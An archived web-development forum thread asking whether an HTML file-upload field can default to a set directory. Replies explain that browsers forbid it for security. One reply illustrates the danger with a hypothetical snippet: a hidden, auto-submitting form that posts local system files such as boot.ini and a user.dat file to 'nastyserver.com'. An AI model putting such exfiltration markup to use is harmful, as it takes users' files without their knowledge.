Ask a Question related to ASP, Design and Development.
-
Paul Moffitt #1
input type=file
is it possible to define a default or start up directory with input
type="file" field type?
If so, is it also possible to filter by another option box selection?
If so, how so?
Thank you
Paul Moffitt
Paul Moffitt Guest
-
changing input type file
i would very very much like to change the browse button on the file upload to one of my own am i right in thinking if i create an inhertited... -
Input type file on asp page
Hi there Is there any way to se the default of a file asp (html) component to a specified directory on a network drive every time an instrnet asp... -
HowTo Send Uploaded File with INPUT Type file to Sql Server Image Data Type
I have the following problem: I have the following form client side: <FORM.......> <FORM action="./WZUpload.asp" method="Post"... -
HowTo Send Uploaded File with INPUT Type file to Sql Server Image Data Type ?
I have the following problem: I have the following form client side: <FORM.......> <FORM action="./WZUpload.asp" method="Post"... -
reading the input type=file tag with ie6 in asp
I wanted to write a simple page to let me choose a directory and then list the files in it. The end goal was to make an easy way to copy all the... -
Ray at #2
Re: input type=file
No, it is not. For security reasons, you cannot pre-specify any sort of
value for a file input. (Unless you run across someone using IE 1 or
something maybe...)
Ray at work
"Paul Moffitt" <NOSPAMpaulmoffitt@iniinc.com> wrote in message
news:eNNNfGXbDHA.1808@TK2MSFTNGP11.phx.gbl...> is it possible to define a default or start up directory with input
> type="file" field type?
>
> If so, is it also possible to filter by another option box selection?
>
> If so, how so?
>
> Thank you
>
> Paul Moffitt
>
>
Ray at Guest
-
Aaron Bertrand - MVP #3
Re: input type=file
> is it possible to define a default or start up directory with input
No. What would prevent you from doing this?> type="file" field type?
<form method=post action=http://nastyserver.com/ target=hiddenframe>
<input type=file value='c:\boot.ini'>
<input type=file value='c:\windows\system32\user.dat'>
....
etc etc
....
</form>
<iframe name=hiddenframe width=1 height=1 style='visibility:hidden'>
</iframe>
<script>
document.forms[0].submit();
</script>
I rather like this security mechanism. If your users can't figure out how
to use a browse... dialog, it might be time to upgrade to better users.
Aaron Bertrand - MVP Guest
-
John Beschler #4
Re: input type=file
>> it might be time to upgrade to better users.
Where do I request this upgrade? I didn't even know I had
that option. Do I send the old ones (users) back to you?
:)
John
John Beschler Guest
-
Aaron Bertrand - MVP #5
Re: input type=file
> Do I send the old ones (users) back to you?
Gosh no. I think I'm about 5 versions ahead of you. :-)
Aaron Bertrand - MVP Guest



Reply With Quote

